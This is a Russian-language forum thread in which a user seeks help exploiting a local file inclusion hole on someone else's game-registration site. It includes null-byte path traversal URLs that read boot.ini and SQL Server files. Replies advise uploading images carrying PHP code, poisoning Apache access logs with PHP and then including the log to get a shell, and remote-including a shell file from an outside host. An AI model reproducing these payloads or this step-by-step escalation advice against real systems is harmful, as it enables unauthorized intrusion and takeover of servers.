НАйден инклюд типа www.site.com/index.php?item=../../../../../../../../../boot.ini%00
какова дальнейшая последовательность действий? пытался передать параметры для cmd.exe, не выходит. Все конфиги в .php файлах, то есть инклудятся без отображения. Пытался вытащить mdf файлы по известным названиям баз данных, но тоже облом - пути вроде подобрал (/index.php?item=../../../../../../../../program%20files/microsoft%20sql%20server/mssql.1/mssql/binn/sqlctr.ini%00 выводится), а вот мдфники не выдираются..
Вобщем хелп, что тут можно попытатся сделать?

мб на сайте есть форум? ну или какой нибудь скрипт заливки картинок. Заливаешь картинку с пшп кодом внутри и инклудишь её

Да в том то и дело, что все форумы и галереи лежат на основном хосте, а этот дополнительный чисто под регистрации онлайн игрушки. Заливок никаких как и удалённого инклюда.

Ищи лог апача.

Program Files\Apache Group\Apache\logs\access_log

Пробуй передать php код через http запрос. Он попадет в логи и проинклудив лог получишь шелл.

приинклудь шел и всех делов то
www.site.com/index.php?item=http://www.site.ru/shell.txt

приинклудь шел и всех делов то
ты наркоман?
Заливок никаких как и удалённого инклюда

Ищи лог апача.

Program Files\Apache Group\Apache\logs\access_log

Пробуй передать php код через http запрос. Он попадет в логи и проинклудив лог получишь шелл.
Мм.. спасибо за дельный совет, завтра попробую. Сервак просто в дауне.